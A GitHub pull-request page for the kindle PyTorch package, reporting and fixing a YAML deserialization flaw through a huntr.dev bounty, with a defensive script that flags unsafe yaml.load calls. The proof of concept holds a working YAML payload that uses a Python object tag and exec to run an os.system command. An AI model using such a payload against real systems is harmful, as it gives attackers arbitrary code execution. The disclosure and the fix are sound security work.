JeiKeiLim / kindle

Making a PyTorch model easier than ever!
https://limjk.ai/kindle/
MIT License
78 stars 7 forks

Security Fix for Arbitrary Code Execution - huntr.dev #21

Closed huntr-helper closed 3 years ago

huntr-helper commented 3 years ago

@Anon-Artist (https://huntr.dev/users/Anon-Artist) has fixed a potential Arbitrary Code Execution vulnerability in your repository 🔨. For more information, visit our website (https://huntr.dev/) or click the bounty URL below...

Q | A
--- | ---
Version Affected | *
Bug Fix | YES
Original Pull Request | https://github.com/418sec/kindle/pull/1
Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/pip/kindle/1/README.md

User Comments:

📊 Metadata *

Kindle is an easy model build package for PyTorch. Building a deep learning model became so simple that almost all models can be made by copy and paste from other existing model codes, which is vulnerable to Arbitrary Code Execution.

Bounty URL: https://www.huntr.dev/bounties/1-pip-kindle

βš™οΈ Description *

Vulnerable to YAML deserialization attack caused by unsafe loading.

💻 Technical Description *

Fixed by avoiding unsafe loader.

πŸ› Proof of Concept (PoC) *

Installation

pip3 install kindle

Run exploit.py

import os
#os.system('pip3 install kindle')
from kindle.generator import custom_yaml_module
payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(payload)
custom_yaml_module.YamlModuleGenerator('config.yml')


xcalc will pop up.

🔥 Proof of Fix (PoF) *

After the fix, Arbitrary Code Execution will never happen.

πŸ‘ User Acceptance Testing (UAT)

After fix functionality is unaffected.

🔗 Relates to...

https://www.huntr.dev/bounties/1-pip-kindle
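
The report above attributes the bug to unsafe YAML loading and the fix to avoiding the unsafe loader. As an added example (not code from the kindle repository or the huntr pull request), this standard-library audit flags PyYAML calls in Python source that use anything other than a safe loader; the function names and the `SAMPLE` source are constructed for illustration.

```python
import ast

# Loader classes that only build plain data (no Python object construction).
SAFE_LOADERS = {"SafeLoader", "CSafeLoader", "BaseLoader", "CBaseLoader"}
# Convenience functions that always use a non-safe loader.
UNSAFE_FUNCS = {"unsafe_load", "unsafe_load_all", "full_load", "full_load_all"}

def _name(node):
    """Last component of a Name/Attribute node (yaml.SafeLoader -> 'SafeLoader')."""
    return getattr(node, "attr", getattr(node, "id", None))

def find_unsafe_yaml_loads(source, yaml_aliases=("yaml",)):
    """Return [(lineno, reason)] for PyYAML calls that may construct objects."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)):
            continue
        base = node.func.value
        if not (isinstance(base, ast.Name) and base.id in yaml_aliases):
            continue
        func = node.func.attr
        if func in UNSAFE_FUNCS:
            findings.append((node.lineno, f"yaml.{func} is not safe for untrusted input"))
        elif func in ("load", "load_all"):
            # Loader may be passed positionally (2nd argument) or by keyword.
            loader = node.args[1] if len(node.args) > 1 else None
            for kw in node.keywords:
                if kw.arg == "Loader":
                    loader = kw.value
            if loader is None:
                findings.append((node.lineno, f"yaml.{func} without an explicit Loader"))
            elif _name(loader) not in SAFE_LOADERS:
                findings.append((node.lineno, f"yaml.{func} with Loader={_name(loader)}"))
    return sorted(findings)

# Constructed sample source, not taken from the kindle code base.
SAMPLE = '''
import yaml
a = yaml.load(stream)
b = yaml.load(stream, Loader=yaml.FullLoader)
c = yaml.load(stream, Loader=yaml.SafeLoader)
d = yaml.safe_load(stream)
e = yaml.unsafe_load(stream)
'''

if __name__ == "__main__":
    for lineno, reason in find_unsafe_yaml_loads(SAMPLE):
        print(f"line {lineno}: {reason}")
```

Calls that the audit reports are the ones to switch to `yaml.safe_load` or an explicit `Loader=yaml.SafeLoader` when the YAML file can come from an untrusted source.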

Anon-Artist commented 3 years ago

Why is this fix not merging, @JeiKeiLim? Are there any issues? Thanks

JeiKeiLim commented 3 years ago

> Why is this fix not merging, @JeiKeiLim? Are there any issues? Thanks

GitHub Action is required to merge, but I forgot to add a PR trigger. I'm going to close and re-open this PR to see if GitHub Action runs.

JeiKeiLim commented 3 years ago

> > Why is this fix not merging, @JeiKeiLim? Are there any issues? Thanks
>
> GitHub Action is required to merge, but I forgot to add a PR trigger. I'm going to close and re-open this PR to see if GitHub Action runs.

GitHub Action is running now. I will merge when it's done!

Anon-Artist commented 3 years ago

I hope everything will be okay, thanks @JeiKeiLim

JeiKeiLim commented 3 years ago

> I hope everything will be okay, thanks @JeiKeiLim

Thank you for the PR!